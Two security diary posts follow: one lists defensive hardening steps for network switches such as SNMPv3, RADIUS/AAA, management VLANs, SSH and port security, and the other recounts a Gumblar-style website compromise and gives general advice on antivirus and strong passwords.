In Australia it is at the moment winter.  Granted the winter temperature in Sydney is pretty much the same as it is in London in summer, but for us it is cold.  Many Australians, including myself, grew up in the northern hemisphere and Christmas just isn't Christmas when the icecream melts faster than you can scoop.   So we often have a Christmas in July.  Find a cold spot (usually in the mountains where there is snow), get some friends together, fish, drink, cook a turkey and have a Christmas dinner.  Including, sometimes, presents.   My present this July was to put together a network for one of our clients.  :-) I asked, they bought and I configured.  Moving to a new datacentre and new premises is just great for getting it right (well, so far) from the start.

So it got me thinking about hardening the networking devices so the next pentester that comes on site does not have a free pass to the network.  We still have some things to do, but I thought I'd share the few things that we have done so far and hopefully it will help you out, or you might be able to add to it.

So here are some of the things we did to start with on the switches: 

• Default passwords - change the default passwords on the device, all of them, not just the one on the account being used.  A number of switches have multiple built in accounts, some of which are easily forgotten.
• SNMP v3 - if the device supports it used it, otherwise use a nice long comunity string, just be aware that it will be compromised and at least read access to the device will be gained.
• Logging - Use centralised logging of switch activities.
• AAA - Create a management group in AD, place those that need access to the devices in the group and then use Radius to authenticate users.  This does make access as good as the password used by staff, but you can also use tokens to authenticate. Shouldn't be much of a problem as people generally don't need to log into switches anyway.
• Backup userid/password - if using AAA authentication make sure you have a local userid or password that can be used in case the radius servers aren't available.
• Management VLAN - Many switches support a management VLAN so configure it and then use ACL to control access to this VLAN.  This just takes the management function of the main network and makes life harder for the pentester.
• Network Segmentation - Set up VLANs to segregate your network segments, then use ACLs to control traffic flows between them (Note: use with care as this is easy to get wrong). Also for network segments of different security requirements such as a DMZ, use a different physical switch, don't just VLAN them off.
• Labeling of Ports - Not really a security measure as such, but many switches allow you to name ports.  This means that with a simple show command you can see which port is your uplink, downlink, etc. Comes in handy when the diagram is missing or out of date.  Of course this does mean that if someone compromises the device they know what to target.
• SSH /Telnet - Use SSH v2, disable telnet.
• Web interface - If you need it use SSL, otherwise disable it.  Unfortunately many switches still need you to mange the device using multiple interface as not all the functionality is available from every interface.
• TFTP - well if you really, really need it, but at least configure the location that is valid. 
• Management IPs - Many switches allow you to configure the management IP addresses for the device.  Configure these and you make life harder for attackers.

So these are some of the starting things to do.  The next stage is port security, which is a whole different kettle of fish and for a different day. 

Document the hardening steps for your environment and implement a process to make sure that the configurations do not change without approval.  There are a number of tools around that will download the configuration from the switch and perform a comparison with a previous version (make sure you protect these of course).   Another thing to consider is to regularly dump the mac address tables on each of the devices so you can trace which device was connected to which switch.  It allows you to identify devices on the network.  Something like Nedi or Netdisco (you may know others) will do this for you, it places the info in a database and allows you to find any network device and which switch port it is plugged into.  Very handy when you need to chase down a device. 

If you have some hints on hardening your switches (we'll leave routers for another day), let me know and I'll update this diary with your additions.

Happy hardening.

Couple of updates

Port Security - 802.1x port security may be a bit much for you, but you can still do a few things on most switches, such as preventing ports from learning more than 1 mac address, assigning mac addresses to ports.

Dynamic VLAN - Allocate the VLAN dynamically and if the user doesn't match place them on a holding VLAN.

NTP - I had logging and in my head that included time synchronisation, but someone pointed out that it would be better to spell it out

Monitoring - Ports that receive 10x the usual traffic may need a closer look

If using CISCO there are a swag of other things you can/need to do. there is a link in the comments to the NSA guide which is very comprehensive.  Many of the things also apply to other vendor devices.

Thanks for sending in your suggestions.  There were a number of other good suggestions, but either product specific, leaning more towards routers or general security management so I left them out for the moment.

Mark H - Shearwater

We received an email today from a lady who runs a website that helps to look for and locate missing children. She has been using Google Alerts to get the information out about the children they are trying to locate.   Unfortunately someone has compromised one of the links and it was passing infections to those who have visited the page.  The lady was really disappointed and angry that someone would do something so awful to such a good cause.

Unfortunately this is happening more often than you realize.  Websites that are trying to improve our world, trying to help those who can't help themselves, business websites and social networking sites have all fallen victim to these bad players.

As I mentioned in my diary yesterday we had a customers website that was Gumblar'd.  We disabled the website and changed the FTP and Admin password on the account.  It was really a good thing that we did.  I checked my logs this morning and sure enough - the perp that compromised the account must have discovered that his little BOT had died and was attempting to login last night to revive it.  Fortunately they were unable too and now we have firewalled them so that they can't  get to any of our servers again.

So this is just a word of warning.  You can't be sure that you will not visit a website that has some malware imbedded so make sure you protect yourself.  Make sure that you use a good anti-virus, make sure that you use a firewall, make sure that you use good, strong passwords and change them often.  There are several sites on the Internet that will tell you how strong you passwords are. A couple that I have used are:

www.microsoft.com/protect/yourself/password/checker.mspx

www.securitystats.com/tools/password.php

We all need to do our part to minimize the damage done by the bad guys and try to help to teach our friends, relatives and neighbors to protect themselves as well.  To all of you that do, thanks a bunch.  You help to make our Internet a safer place for all.

Deb Hale Long Lines, LLC